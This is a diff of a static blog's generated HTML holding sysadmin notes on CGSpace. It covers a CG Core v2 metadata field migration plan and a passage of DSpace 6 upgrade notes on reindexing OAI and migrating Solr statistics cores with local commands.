+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">CGSpace CG Core v2 Migration</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-02-21T13:27:35+02:00">Sun Feb 21, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p>
+<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p>
+<ul>
+<li><a href="#proposed-changes">Proposed Changes</a>
+<ul>
+<li><a href="#out-of-scope">Out of Scope</a></li>
+</ul>
+</li>
+<li><a href="#fields-to-create">Fields to Create</a></li>
+<li><a href="#fields-to-delete">Fields to Delete</a></li>
+<li><a href="#implementation-progress">Implementation Progress</a></li>
+</ul>
+<h2 id="proposed-changes">Proposed Changes</h2>
+<p>As of 2021-01-18 the scope of the changes includes the following fields:</p>
+<ul>
+<li>cg.creator.id→cg.creator.identifier
+<ul>
+<li>ORCID identifiers</li>
+</ul>
+</li>
+<li>dc.format.extent→dcterms.extent</li>
+<li>dc.date.issued→dcterms.issued</li>
+<li>dc.description.abstract→dcterms.abstract</li>
+<li>dc.description→dcterms.description</li>
+<li>dc.description.sponsorship→cg.contributor.donor
+<ul>
+<li>values from CrossRef or Grid.ac if possible</li>
+</ul>
+</li>
+<li>dc.description.version→cg.reviewStatus</li>
+<li>cg.fulltextstatus→cg.howPublished
+<ul>
+<li>CGSpace uses values like &ldquo;Formally Published&rdquo; or &ldquo;Grey Literature&rdquo;</li>
+</ul>
+</li>
+<li>dc.identifier.citation→dcterms.bibliographicCitation</li>
+<li>cg.identifier.status→dcterms.accessRights
+<ul>
+<li>current values are &ldquo;Open Access&rdquo; and &ldquo;Limited Access&rdquo;</li>
+<li>future values are possibly &ldquo;Open&rdquo; and &ldquo;Restricted&rdquo;?</li>
+</ul>
+</li>
+<li>dc.language.iso→dcterms.language
+<ul>
+<li>current values are ISO 639-1 (aka Alpha 2)</li>
+<li>future values are possibly ISO 639-3 (aka Alpha 3)?</li>
+</ul>
+</li>
+<li>cg.link.reference→dcterms.relation</li>
+<li>dc.publisher→dcterms.publisher</li>
+<li>dc.relation.ispartofseries will be split into:
+<ul>
+<li>series name: dcterms.isPartOf</li>
+<li>series number: cg.number</li>
+</ul>
+</li>
+<li>dc.rights→dcterms.license
+<ul>
+<li>Using <a href="https://spdx.org/licenses/">SPDX license identifiers</a> if possible</li>
+</ul>
+</li>
+<li>dc.source→cg.journal</li>
+<li>dc.subject→dcterms.subject</li>
+<li>dc.type→dcterms.type</li>
+<li>dc.identifier.isbn→cg.isbn</li>
+<li>dc.identifier.issn→cg.issn</li>
+<li>cg.targetaudience→dcterms.audience</li>
+</ul>
+<h3 id="out-of-scope">Out of Scope</h3>
+<p>The following fields are currently out of the scope of this migration because they are used internally by DSpace 5.x/6.x and would be difficult to change without significant modifications to the core of the code:</p>
+<ul>
+<li>dc.title (<code>IncludePageMeta.java</code> only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)</li>
+<li>dc.title.alternative</li>
+<li>dc.date.available</li>
+<li>dc.date.accessioned</li>
+<li>dc.identifier.uri (hard coded for Handle assignment upon item submission)</li>
+<li>dc.description.provenance</li>
+<li>dc.contributor.author (<code>IncludePageMeta.java</code> only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)</li>
+</ul>
+<h2 id="fields-to-create">Fields to Create</h2>
+<p>Make sure the following fields exist:</p>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> cg.creator.identifier (247)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.contributor.donor (248)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.reviewStatus (249)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.howPublished (250)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.journal (251)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.isbn (252)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.issn (253)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.volume (254)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.number (255)</li>
+<li><input checked="" disabled="" type="checkbox"> cg.issue (256)</li>
+</ul>
+<h2 id="fields-to-delete">Fields to delete</h2>
+<p>Fields to delete after migration:</p>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> cg.creator.id</li>
+<li><input checked="" disabled="" type="checkbox"> cg.fulltextstatus</li>
+<li><input checked="" disabled="" type="checkbox"> cg.identifier.status</li>
+<li><input checked="" disabled="" type="checkbox"> cg.link.reference</li>
+<li><input checked="" disabled="" type="checkbox"> cg.targetaudience</li>
+</ul>
+<h2 id="implementation-progress">Implementation Progress</h2>
+<p>Tally of the status of the implementation of the new fields in the CGSpace <code>6_x-cgcorev2</code> branch.</p>
+<table>
+<thead>
+<tr>
+<th>Field Name</th>
+<th style="text-align:center">migrate-fields.sh</th>
+<th style="text-align:center">Input Forms</th>
+<th style="text-align:center">XMLUI Themes¹</th>
+<th style="text-align:center">dspace.cfg</th>
+<th style="text-align:center">Discovery</th>
+<th style="text-align:center">Atmire Modules</th>
+<th style="text-align:center">Crosswalks</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<td>cg.creator.identifier</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.extent</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.issued</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">?</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.abstract</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.description</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>cg.contributor.donor</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>cg.reviewStatus</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>cg.howPublished</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.bibliographicCitation</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.accessRights</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.language</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.relation</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.publisher</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.isPartOf</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.license</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>cg.journal</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.subject</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.type</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>cg.isbn</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>cg.issn</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+<tr>
+<td>dcterms.audience</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">-</td>
+<td style="text-align:center">✓</td>
+<td style="text-align:center"></td>
+</tr>
+</tbody>
+</table>
+<p>There are a few things that I need to check once I get a deployment of this code up and running:</p>
+<ul>
+<li>Assess the XSL changes to see if things like <code>not(@qualifier)]</code> still make sense after we move fields from DC to DCTERMS, as some fields will no longer have qualifiers</li>
+<li>Do I need to edit crosswalks that we are not using, like <a href="https://wiki.lyrasis.org/display/DSDOC5x/DSpace+AIP+Format#DSpaceAIPFormat-MODSSchema">MODS</a>?</li>
+<li>There is potentially a lot of work in the OAI metadata formats like DIM, METS, and QDC (see <code>dspace/config/crosswalks/oai/*.xsl</code>)</li>
+</ul>
+<hr>
+<p>¹ Not committed yet because I don&rsquo;t want to have to make minor adjustments in multiple commits. Re-apply the gauntlet of fixes with the sed script:</p>
+<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/cgspace-dspace6-upgrade/index.html b/docs/cgspace-dspace6-upgrade/index.html
new file mode 100644
index 000000000..0571ce940
--- /dev/null
+++ b/docs/cgspace-dspace6-upgrade/index.html
@@ -0,0 +1,525 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace DSpace 6 Upgrade" />
+<meta property="og:description" content="Documenting the DSpace 6 upgrade." />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/" />
+<meta property="article:published_time" content="2020-11-15T13:27:35+02:00" />
+<meta property="article:modified_time" content="2020-12-01T19:15:48+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace DSpace 6 Upgrade"/>
+<meta name="twitter:description" content="Documenting the DSpace 6 upgrade."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "CGSpace DSpace 6 Upgrade",
+  "url": "https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/",
+  "wordCount": "1570",
+  "datePublished": "2020-11-15T13:27:35+02:00",
+  "dateModified": "2020-12-01T19:15:48+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes, Migration",
+  "description": "Documenting the DSpace 6 upgrade."
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/">
+
+    <title>CGSpace DSpace 6 Upgrade | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/">CGSpace DSpace 6 Upgrade</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-11-15T13:27:35+02:00">Sun Nov 15, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p>
+<ul>
+<li><a href="#re-import-oai-with-clean-index">Re-import OAI with clean index</a></li>
+<li><a href="#processing-solr-statistics-with-solr-upgrade-statistics-6x">Processing Solr statistics with solr-upgrade-statistics-6x</a>
+<ul>
+<li><a href="#statistics">Current year&rsquo;s statistics core</a></li>
+<li><a href="#statistics-2019">statistics-2019 core</a></li>
+<li><a href="#statistics-2018">statistics-2018 core</a></li>
+<li><a href="#statistics-2017">statistics-2017 core</a></li>
+<li><a href="#statistics-2016">statistics-2016 core</a></li>
+<li><a href="#statistics-2015">statistics-2015 core</a></li>
+<li><a href="#statistics-2014">statistics-2014 core</a></li>
+<li><a href="#statistics-2013">statistics-2013 core</a></li>
+<li><a href="#statistics-2012">statistics-2013 core</a></li>
+<li><a href="#statistics-2011">statistics-2013 core</a></li>
+<li><a href="#statistics-2010">statistics-2013 core</a></li>
+</ul>
+</li>
+<li><a href="processing-solr-statistics-with-atomicstatisticsupdatecli">Processing Solr statistics with AtomicStatisticsUpdateCLI</a></li>
+</ul>
+<h3 id="re-import-oai-with-clean-index">Re-import OAI with clean index</h3>
+<p>After the upgrade is complete, re-index all items into OAI with a clean index:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
+</span></span><span style="display:flex;"><span>$ dspace oai -c import
+</span></span></code></pre></div><p>The process ran out of memory several times so I had to keep trying again with more JVM heap memory.</p>
+<h3 id="processing-solr-statistics-with-solr-upgrade-statistics-6x">Processing Solr Statistics With solr-upgrade-statistics-6x</h3>
+<p>After the main upgrade process was finished and DSpace was running I started processing the Solr statistics with <code>solr-upgrade-statistics-6x</code> to migrate all IDs to UUIDs.</p>
+<h2 id="statistics">statistics</h2>
+<p>First process the current year&rsquo;s statistics core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;</span>
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           3,817,407    Bistream View
+</span></span><span style="display:flex;"><span>           1,693,443    Item View
+</span></span><span style="display:flex;"><span>             105,974    Collection View
+</span></span><span style="display:flex;"><span>              62,383    Community View
+</span></span><span style="display:flex;"><span>             163,192    Community Search
+</span></span><span style="display:flex;"><span>             162,581    Collection Search
+</span></span><span style="display:flex;"><span>             470,288    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           6,475,268    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
+<ul>
+<li>227,000: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>471,000: <code>id:/.+-unmigrated/</code></li>
+<li>698,000: <code>*:* NOT id:/.{36}/</code></li>
+<li>Majority are <code>type: 5</code> (aka SITE, according to <code>Constants.java</code>) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2019">statistics-2019</h2>
+<p>Processing the statistics-2019 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           5,569,344    Bistream View
+</span></span><span style="display:flex;"><span>           2,179,105    Item View
+</span></span><span style="display:flex;"><span>             117,194    Community View
+</span></span><span style="display:flex;"><span>             104,091    Collection View
+</span></span><span style="display:flex;"><span>             774,138    Community Search
+</span></span><span style="display:flex;"><span>             568,347    Collection Search
+</span></span><span style="display:flex;"><span>           1,482,620    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>          10,794,839    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
+<ul>
+<li>2,690,309: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>1,494,587: <code>id:/.+-unmigrated/</code></li>
+<li>4,184,896: <code>*:* NOT id:/.{36}/</code></li>
+<li>4,172,929 are <code>type: 5</code> (aka SITE) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2019/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2018">statistics-2018</h2>
+<p>Processing the statistics-2018 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           3,561,532    Bistream View
+</span></span><span style="display:flex;"><span>           1,129,326    Item View
+</span></span><span style="display:flex;"><span>              97,401    Community View
+</span></span><span style="display:flex;"><span>              63,508    Collection View
+</span></span><span style="display:flex;"><span>             207,827    Community Search
+</span></span><span style="display:flex;"><span>              43,752    Collection Search
+</span></span><span style="display:flex;"><span>             457,820    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           5,561,166    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
+</span></span></code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
+<ul>
+<li>365,473: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>546,955: <code>id:/.+-unmigrated/</code></li>
+<li>923,158: <code>*:* NOT id:/.{36}/</code></li>
+<li>823,293: are <code>type: 5</code> so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2017">statistics-2017</h2>
+<p>Processing the statistics-2017 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2017
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           2,529,208    Bistream View
+</span></span><span style="display:flex;"><span>           1,618,717    Item View
+</span></span><span style="display:flex;"><span>             144,945    Community View
+</span></span><span style="display:flex;"><span>              74,249    Collection View
+</span></span><span style="display:flex;"><span>             479,647    Community Search
+</span></span><span style="display:flex;"><span>             114,658    Collection Search
+</span></span><span style="display:flex;"><span>             852,215    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           5,813,639    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
+<ul>
+<li>808,309: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>893,868: <code>id:/.+-unmigrated/</code></li>
+<li>1,702,177: <code>*:* NOT id:/.{36}/</code></li>
+<li>1,660,524 are <code>type: 5</code> (SITE) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2017/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2016">statistics-2016</h2>
